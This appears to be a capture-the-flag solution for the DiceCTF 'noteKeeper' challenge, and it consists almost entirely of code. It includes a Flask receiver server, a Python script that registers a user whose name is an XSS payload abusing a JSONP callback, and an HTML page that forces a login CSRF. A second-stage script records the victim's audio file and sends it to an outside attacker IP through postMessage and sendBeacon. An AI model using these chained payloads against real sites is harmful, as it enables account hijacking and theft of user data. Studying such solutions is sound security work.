noteKeeper solution dicectf

app.py

from flask import Flask

app = Flask(__name__)

@app.route("/")
def main():
    return """\
<script>
onmessage = e => {
    ifr = document.createElement("iframe");
    ifr.src = "/dump/" + e.data;
    document.body.append(ifr);
}
</script>
"""

@app.route("/dump/<info>")
def test(info):
    data = info.split(":")
    with open(data[0] + ".txt", "w") as f:
        f.write(data[1])
    return "xd"

app.run(host="0.0.0.0")

create_user.py

import requests
from urllib import parse
import secrets

#url = "http://localhost"
url = "https://notekeeper.mc.ax"
endpoint_url = "http://104.248.133.199:5000/" # this runs app.py
token = secrets.token_hex()

payload =  f"""\
<iframe srcdoc="<script src='/api/notes/list?callback=parent.opener.setTimeout'></script>"></iframe>\
""" + token
payload = parse.quote(payload)



stage2 = f"""\
w = window.open()

recording_code = `
<button id=logout></button>
<script>
        async function sleep(ms) {{
            return new Promise(resolve=>setTimeout(resolve, ms));
        }}
        logout.onclick = async e => {{
            try {{
                a = new Audio("{url}/api/audio/file?");
                await sleep(100);
                const ac = new AudioContext();
                const source = ac.createMediaElementSource(a);
                const dest = ac.createMediaStreamDestination();
                source.connect(dest);

                const recorder = new MediaRecorder(dest.stream);
                recorder.start();
                a.play();
                recorder.ondataavailable = ev => {{
                    console.log(ev.data);
                    ev.data.arrayBuffer().then(async buf =>{{
                            arr = new Uint8Array(buf);
                            w2= window.open("{endpoint_url}");
                            await sleep(500);
                            console.log(w2);
                            for (let i=0; i<arr.length; i += 1000) {{
                                data = i + ":" + new Uint8Array(arr.subarray(i, i+1000)).toString();
                                console.log(data);
                                w2.postMessage(data, "*");
                            }}
                        }})
                }};
                await sleep(10000);
                recorder.stop();
            }} catch (ex) {{
                console.log(ex);
                navigator.sendBeacon("{endpoint_url}" + ex);
            }}
        }}
</script>
`

w.eval(`
    async function sleep(ms) {{
        return new Promise(resolve=>setTimeout(resolve, ms));
    }}
    (async () =>{{
        await sleep(5000);
        opener.location = "{url}/script.js"
        script_content =  atob("${{btoa(recording_code)}}");
        console.log(script_content);
        await sleep(500);
        opener.document.write(script_content);
    }})()
`)
"""

password = "asdasd"

print(f"username: {payload}")
print(f"password: {password}")

sess = requests.session()

r1 = sess.post(url + "/api/register", headers={
    "Content-Type": "application/x-www-form-urlencoded"
}, data = f"username={payload}&username&password={password}")

r2 = sess.post(url + "/api/notes/add", headers={
    "Content-Type": "application/x-www-form-urlencoded"
}, data={"note": stage2})

print(r2.status_code)

start.html

<form id=testform method="post">
    <input name=username value=""/>
    <input name=username value="">
    <input name="password" value="">
</form>
<script>
    //url = "http://localhost";
    url = "https://notekeeper.mc.ax"
    testform.action = url + "/api/login";
    testform.username[0].value = decodeURIComponent("%3Ciframe%20srcdoc%3D%22%3Cscript%20src%3D%27/api/notes/list%3Fcallback%3Dparent.opener.setTimeout%27%3E%3C/script%3E%22%3E%3C/iframe%3Ebb569ca119e8dc25933b390a06a615adbad2d8304ad176f5ae98948c5d315aea");
    testform.password.value = "asdasd";
    testform.target = "_blank";
    testform.submit();
    location = url + "/script.js";
</script>